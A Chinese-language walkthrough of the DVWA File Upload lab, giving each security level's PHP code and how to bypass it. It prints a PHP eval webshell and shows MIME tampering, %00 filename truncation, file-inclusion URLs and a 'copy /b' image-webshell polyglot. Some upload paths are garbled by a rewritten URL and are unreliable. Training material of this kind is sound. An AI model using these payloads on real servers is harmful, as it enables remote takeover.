File Upload,即文件上传。文件上传漏洞通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。
先看常规的文件上传操作:
客户端上传:
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>文件上传操作</title> </head> <body> <form action="upload.php" method="post" enctype="multipart/form-data"> 用户名:<input type="text" name="username"><br /> 头像:<input type="file" name="img"><br /> <input type="submit" value="提交"> </form> </body> </html>
在HTML <form>标签中enctype属性规定在发送到服务器之前应该如何对表单数据进行编码。
它的值有三种:
application/x-www-form-urlencoded: 在发送前编码所有字符(默认)
multipart/form-data: 不对字符编码。在使用包含文件上传控件的表单时,必须使用该值。
text/plain: 空格转换为 "+" 加号,但不对特殊字符编码。
服务端接收:
使用$_FILES数组接收参数。
我们打印$_FILES
print_r($_FILES);
发现上传一个文件时的属性有:
[name] => feng.jpeg 文件的名称
[type] => image/jpeg 文件的MIME类型
[tmp_name] => C:\Users\Administrator\AppData\Local\Temp\php2007.tmp 文件的临时位置
[error] => 0 文件的错误信息 0 ok 1234 error
[size] => 2859 文件的大小
文件上传漏洞的利用的条件:
1.能够成功上传木马文件
2.上传文件必须能够被执行
3.上传文件的路径必须可知
下面对四种级别的代码进行分析。
Low Security Level:
<?php if( isset( $_POST[ ‘Upload‘ ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackablehttp://img.558idc.com/uploadfile/"; $target_path .= basename( $_FILES[ ‘uploaded‘ ][ ‘name‘ ] ); // Can we move the file to the upload folder? if( !move_uploaded_file( $_FILES[ ‘uploaded‘ ][ ‘tmp_name‘ ], $target_path ) ) { // No echo ‘<pre>Your image was not uploaded.</pre>‘; } else { // Yes! echo "<pre>{$target_path} succesfully uploaded!</pre>"; } } ?>
basename()函数返回路径中的文件名部分。
string basename ( string $path [, string $suffix ] )
参数介绍:
$path:必需。规定要检查的路径。在Windows中,斜线(/)和反斜线(\)都可以用作目录分隔符。在其它环境下是斜线(/)。
$suffix:可选。规定文件扩展名。如果文件有suffix,则不会输出这个扩展名。
举例:
<?php $path = "/testweb/home.php"; //显示带有文件扩展名的文件名 echo basename($path); //显示不带有文件扩展名的文件名 echo basename($path,".php"); ?>
输出:
home.php
home
Exploit
因为对于上面的利用条件全都满足,直接上传文件x.php(一句话木马)
<?php @eval($_POST[‘x‘]);?>
上传成功得到路径:
http://www.dvwa.com/hackablehttp://img.558idc.com/uploadfile/x.php
菜刀成功连接
Medium Security Level
<?php if( isset( $_POST[ ‘Upload‘ ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackablehttp://img.558idc.com/uploadfile/"; $target_path .= basename( $_FILES[ ‘uploaded‘ ][ ‘name‘ ] ); // File information $uploaded_name = $_FILES[ ‘uploaded‘ ][ ‘name‘ ]; $uploaded_type = $_FILES[ ‘uploaded‘ ][ ‘type‘ ]; $uploaded_size = $_FILES[ ‘uploaded‘ ][ ‘size‘ ]; // Is it an image? if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) && ( $uploaded_size < 100000 ) ) { // Can we move the file to the upload folder? if( !move_uploaded_file( $_FILES[ ‘uploaded‘ ][ ‘tmp_name‘ ], $target_path ) ) { // No echo ‘<pre>Your image was not uploaded.</pre>‘; } else { // Yes! echo "<pre>{$target_path} succesfully uploaded!</pre>"; } } else { // Invalid file echo ‘<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>‘; } } ?>
从代码中可以看到,Medium Security Level的代码对上传文件的类型、大小做了限制,要求文件类型必须是jpeg或者png,大小不能超过100000B(约为97.6KB)。
Exploit
1).抓包修改文件类型
上传x.png文件,使用Burpsuite抓包:
可以看到文件类型为image/png,尝试修改filename为x.php,上传后成功得到x.php文件:
菜刀连接:
http://www.dvwa.com/hackablehttp://img.558idc.com/uploadfile/x.php
2).%00截断上传绕过
在php版本小于5.3.4的服务器中,当magic_quote_gpc选项为off时,可以在文件名中使用%00截断,所以可以把上传文件命名为x.php%00.png。
这里我使用php 5.2.17版本进行测试:
可以看到,包中的文件类型为image/png,可以通过文件类型检查。点击上传后:
服务器会认为其文件名为x.php,顺势解析为php文件。
菜刀连接:
http://www.dvwa.com/hackablehttp://img.558idc.com/uploadfile/x.php%00.png
3)文件上传+文件包含
因为采用的是一句话木马,所以文件大小符合要求,至于文件类型的检查,尝试修改文件名为x.png,上传成功:
但不能解析识别出是PHP文件,菜刀连接报错。
此时我们想到文件包含漏洞的利用。这里可以借助Medium Security Level的文件包含漏洞来获取webshell权限,利用方式如下:
本地文件包含:
http://www.dvwa.com/vulnerabilities/fi/?page=F:/phpStudy/PHPTutorial/WWW/hackablehttp://img.558idc.com/uploadfile/x.png
远程文件包含:
http://www.dvwa.com/vulnerabilities/fi/?page=hthttp://tp://www.dvwa.com/hackablehttp://img.558idc.com/uploadfile/x.png
成功获取webshell权限:
两种方式,菜刀均可以成功连接。
High Security Level
<?php if( isset( $_POST[ ‘Upload‘ ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackablehttp://img.558idc.com/uploadfile/"; $target_path .= basename( $_FILES[ ‘uploaded‘ ][ ‘name‘ ] ); // File information $uploaded_name = $_FILES[ ‘uploaded‘ ][ ‘name‘ ]; $uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, ‘.‘ ) + 1); $uploaded_size = $_FILES[ ‘uploaded‘ ][ ‘size‘ ]; $uploaded_tmp = $_FILES[ ‘uploaded‘ ][ ‘tmp_name‘ ]; // Is it an image? if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) && ( $uploaded_size < 100000 ) && getimagesize( $uploaded_tmp ) ) { // Can we move the file to the upload folder? if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) { // No echo ‘<pre>Your image was not uploaded.</pre>‘; } else { // Yes! echo "<pre>{$target_path} succesfully uploaded!</pre>"; } } else { // Invalid file echo ‘<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>‘; } } ?>
strrpos()函数:
strrpos(string,find,start)
函数返回字符串find在另一字符串string中最后一次出现的位置,如果没有找到字符串则返回false,可选参数start规定在何处开始搜索。
函数详细介绍:PHP strrpos() 函数
strtolower()函数:
strtolower(string)
把字符串转换为小写。
getimagesize()函数:
getimagesize(string filename)
getimagesize()函数用于获取图像大小及相关信息,成功则返回一个数组,失败则返回FALSE并产生一条E_WARNING级的错误信息。
函数详细参考:PHP 获取图像信息 getimagesize 函数
可以看到,High Security Level的代码读取文件名中最后一个.后的字符串,通过文件名来限制文件类型因此要求上传文件名形式必须是*.jpg、*.jpeg 、*.png三者之一。getimagesize()函数更是限制了上传文件的文件头必须为图像类型。
Exploit
利用思路主要是:绕过getimagesize()函数检测识别和上传文件名的检测识别。
让getimagesize()函数检测无效的方法:文件头欺骗,继而使得getimagesize()函数无法判断。
下面科普下文件头相关的知识:
常见的图片格式的文件头标识如下:
JPEG/JPG - 文件头标识 (2 bytes): FF D8 (SOI) (JPEG 文件标识) - 文件结束标识 (2 bytes): FF D9 (EOI) PNG - 文件头标识 (8 bytes) 89 50 4E 47 0D 0A 1A 0A GIF - 文件头标识 (6 bytes) 47 49 46 38 39(37) 61 |GIF89(7)a
更多格式的文件头标识参见文章:通过文件头标识判断图片格式
文件头欺骗:伪造文件头,使文件头标识一样,其它部分我们修改为一句话木马,也就成了我们常说的图片一句话。
下面是两种常见的图片一句话制作方法:
方法 1:
copy y.png/b+x.php/a z.png
copy 命令中的两个文件的位置不能颠倒,否则生成的文件格式无效。
方法 2:
先用C32Asm十六进制模式打开y.png,然后将x.php拖入,然后另存为z.png
之后,我们将制作好的图片一句话,用getimagesize()函数识别测试,并与原图片文件对比,打印输出:
<?php header("Content-type: text/html; charset=utf-8"); echo "y.png:"; $array0 = getimagesize("images/y.png"); print_r($array0); echo "<br />"; echo "copy 命令制作的图片一句话 z1.png:"; $array1 = getimagesize("images/z1.png"); print_r($array1); echo "C32Asm 制作的图片一句话 z2.png:"; $array2 = getimagesize("images/z2.png"); print_r($array2); ?>
以上是打印输出的file.php文件。
我们发现得到的数组内容没有丝毫改变,
从而证明了两种方法可以绕过getimagesize()函数的检测识别。接着我们再来进行利用:
1).%00截断上传绕过
采用%00截断的方法可以轻松绕过文件名的检查,采用刚才的图片一句话进行上传。(适用于php小于 5.3.4 版本)
菜刀连接:
http://www.dvwa.com/hackablehttp://img.558idc.com/uploadfile/z.php%00.png
2).文件上传 + 文件包含
通过上传图片一句话和借助High Security Level的文件包含漏洞来进行利用:
菜刀连接:
http://www.dvwa.com/vulnerabilities/fi/?page=file:///F:/phpStudy/PHPTutorial/WWW/hackablehttp://img.558idc.com/uploadfile/z.png
Impossible Security Level
<?php if( isset( $_POST[ ‘Upload‘ ] ) ) { // Check Anti-CSRF token checkToken( $_REQUEST[ ‘user_token‘ ], $_SESSION[ ‘session_token‘ ], ‘index.php‘ ); // File information $uploaded_name = $_FILES[ ‘uploaded‘ ][ ‘name‘ ]; $uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, ‘.‘ ) + 1); $uploaded_size = $_FILES[ ‘uploaded‘ ][ ‘size‘ ]; $uploaded_type = $_FILES[ ‘uploaded‘ ][ ‘type‘ ]; $uploaded_tmp = $_FILES[ ‘uploaded‘ ][ ‘tmp_name‘ ]; // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . ‘hackablehttp://img.558idc.com/uploadfile/‘; //$target_file = basename( $uploaded_name, ‘.‘ . $uploaded_ext ) . ‘-‘; $target_file = md5( uniqid() . $uploaded_name ) . ‘.‘ . $uploaded_ext; $temp_file = ( ( ini_get( ‘upload_tmp_dir‘ ) == ‘‘ ) ? ( sys_get_temp_dir() ) : ( ini_get( ‘upload_tmp_dir‘ ) ) ); $temp_file .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . ‘.‘ . $uploaded_ext; // Is it an image? if( ( strtolower( $uploaded_ext ) == ‘jpg‘ || strtolower( $uploaded_ext ) == ‘jpeg‘ || strtolower( $uploaded_ext ) == ‘png‘ ) && ( $uploaded_size < 100000 ) && ( $uploaded_type == ‘image/jpeg‘ || $uploaded_type == ‘image/png‘ ) && getimagesize( $uploaded_tmp ) ) { // Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD) if( $uploaded_type == ‘image/jpeg‘ ) { $img = imagecreatefromjpeg( $uploaded_tmp ); imagejpeg( $img, $temp_file, 100); } else { $img = imagecreatefrompng( $uploaded_tmp ); imagepng( $img, $temp_file, 9); } imagedestroy( $img ); // Can we move the file to the web root from the temp folder? if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) { // Yes! echo "<pre><a href=‘${target_path}${target_file}‘>${target_file}</a> succesfully uploaded!</pre>"; } else { // No echo ‘<pre>Your image was not uploaded.</pre>‘; } // Delete any temp files if( file_exists( $temp_file ) ) unlink( $temp_file ); } else { // Invalid file echo ‘<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>‘; } } // Generate Anti-CSRF token generateSessionToken(); ?>
相关函数:
in_get(varname)
函数返回相应选项的值
imagecreatefromjpeg(filename)
函数返回图片文件的图像标识,失败返回false
imagejpeg(image,filename,quality)
从image图像以filename为文件名创建一个JPEG图像,可选参数quality,范围从 0(最差质量,文件更小)到 100(最佳质量,文件最大)。
imagedestroy( img )
函数销毁图像资源
可以看到,Impossible Security Level的代码对上传文件进行了重命名(为md5值,导致%00截断无法绕过过滤规则),加入Anti-CSRF token 防护 CSRF攻击,同时对文件的内容作了严格的检查,导致攻击者无法上传含有恶意脚本的文件。
转载自:AnCoLin‘s Blog|影风博客DVWA File Upload 通关教程